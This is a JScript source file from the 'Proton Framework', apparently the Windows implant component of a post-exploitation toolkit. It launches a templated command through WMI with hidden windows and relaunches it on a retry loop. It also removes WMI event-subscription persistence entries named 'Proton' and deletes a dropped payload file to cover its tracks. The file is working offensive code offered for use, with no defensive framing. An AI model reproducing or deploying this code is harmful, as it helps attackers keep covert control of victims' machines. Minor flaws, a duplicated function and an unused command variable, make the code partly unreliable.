//            ---------------------------------------------------
//                             Proton Framework              
//            ---------------------------------------------------
//                Copyright (C) <2019-2020>  <Entynetproject>
//
//        This program is free software: you can redistribute it and/or modify
//        it under the terms of the GNU General Public License as published by
//        the Free Software Foundation, either version 3 of the License, or
//        any later version.
//
//        This program is distributed in the hope that it will be useful,
//        but WITHOUT ANY WARRANTY; without even the implied warranty of
//        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
//        GNU General Public License for more details.
//
//        You should have received a copy of the GNU General Public License
//        along with this program.  If not, see <http://www.gnu.org/licenses/>.

var proton = {};

proton.WS = new ActiveXObject("WScript.Shell");
proton.FS = new ActiveXObject("Scripting.FileSystemObject");

proton.registry = {};
proton.registry.HKCU = 0x80000001;
proton.registry.HKLM = 0x80000002;

proton.isHTA = function()
{
    return typeof(window) !== "undefined";
}

proton.process = {};

proton.process.currentPID = function()
{
    var cmd = proton.file.getPath("%comspec% /K hostname");
    var childPid = proton.WMI.createProcess(cmd);
    var pid = -1;
    var latestTime = 0;
    var latestProc = null;

    var processes = proton.process.list();

    var items = new Enumerator(processes);
    while (!items.atEnd())
    {
        var proc = items.item();

        try
        {
            if (proc.ProcessId == childPid)
            {
                latestProc = proc;
                break;
            }
        } catch (e)
        {
        }
        items.moveNext();
    }

    pid = latestProc.ParentProcessId;
    latestProc.Terminate();

    return pid;
}

proton.process.kill = function(pid)
{
    var processes = proton.process.list();

    var items = new Enumerator(processes);
    while (!items.atEnd())
    {
        var proc = items.item();

        try
        {
            if (proc.ProcessId == pid)
            {
                proc.Terminate();
                return true;
            }
        } catch (e)
        {
        }
        items.moveNext();
    }

    return false;
}

proton.process.list = function()
{
    var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
    var query = "Select * From Win32_Process";

    return wmi.ExecQuery(query);
}

proton.exit = function()
{
    if (proton.isHTA())
    {
        try {
          window.close();
        } catch(e){}

        try {
          window.self.close();
        } catch (e){}

        try {
          window.top.close();
        } catch (e){}


        try{
            self.close();
        } catch (e){}

        try
        {
            window.open('', '_self', '');
            window.close();
        }
        catch (e)
        {
        }
    }

    try
    {
        WScript.quit();
    }
    catch (e)
    {
    }

    try
    {
        var pid = proton.process.currentPID();
        proton.process.kill(pid);
    }
    catch (e)
    {
    }
}

proton.WMI = {};

proton.WMI.createProcess = function(cmd)
{
    var SW_HIDE = 0;
    var pid = 0;

    var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")

    var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_();
    si.ShowWindow = SW_HIDE;
    si.CreateFlags = 16777216;
    si.X = si.Y = si.XSize = si.ySize = 1;

    var w32proc = wmi.Get("Win32_Process");

    var method = w32proc.Methods_.Item("Create");
    var inParams = method.InParameters.SpawnInstance_();
    inParams.CommandLine = cmd;
    inParams.CurrentDirectory = null;
    inParams.ProcessStartupInformation = si;

    var outParams = w32proc.ExecMethod_("Create", inParams);
    return outParams.ProcessId;
}

proton.process.kill = function(pid)
{
    var processes = proton.process.list();

    var items = new Enumerator(processes);
    while (!items.atEnd())
    {
        var proc = items.item();

        try
        {
            if (proc.ProcessId == pid)
            {
                proc.Terminate();
                return true;
            }
        } catch (e)
        {
        }
        items.moveNext();
    }

    return false;
}

proton.file = {};

proton.file.getPath = function(path)
{
    return proton.WS.ExpandEnvironmentStrings(path);
}

proton.file.deleteFile = function(path)
{
    proton.FS.DeleteFile(proton.file.getPath(path), true);
};

proton.shell = {};
proton.shell.run = function(cmd, fork)
{
    var fork = (typeof(fork) !== "undefined") ? fork : true;
    var c = "%comspec% /q /c " + cmd;
    proton.WS.Run(cmd, 0, !fork);
}

proton.persist = {};
proton.persist.run = function(cmd)
{
    var pid = proton.WMI.createProcess(cmd);
    proton.shell.run('ping 127.0.0.1 -n 11', false);
    return pid;
}

proton.persist.clean = function()
{
    var subname = "Proton";
    var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\subscription");
    wmi.Delete("\\\\.\\root\\subscription:__EventFilter.Name=\""+subname+"\"");
    wmi.Delete("\\\\.\\root\\subscription:CommandLineEventConsumer.Name=\""+subname+"\"");
    var ftcb = wmi.Get("__FilterToConsumerBinding").Instances_();
    var instancecount = ftcb.Count;
    var i;
    for (i = 0; i < instancecount; i++) {
        var cons = ftcb.ItemIndex(i);
        if (cons.Consumer.indexOf(subname) != -1) {
            cons.Delete_();
        }
    }
    proton.file.deleteFile(proton.file.getPath("~FDROPDIR~\\~FDROPFILE~"));
}

try
{
    var attempts = ~RETRYATTEMPTS~;
    var delay = ~RETRYDELAY~ + 1;
    var infflag = false;
    if (attempts == -1)
    {
        infflag = true;
    }
    while (true)
    {
        var pid = proton.persist.run("~CMD~");
        if (proton.process.kill(pid))
        {
            if (!infflag)
            {
                attempts -= 1;
                if (attempts == 0)
                {
                    proton.persist.clean();
                    break;
                }
            }
            proton.shell.run('ping 127.0.0.1 -n '+delay.toString(), false);
        }
        else
        {
            break;
        }
    }
}
catch(e)
{
    //do nothing
}

proton.exit();
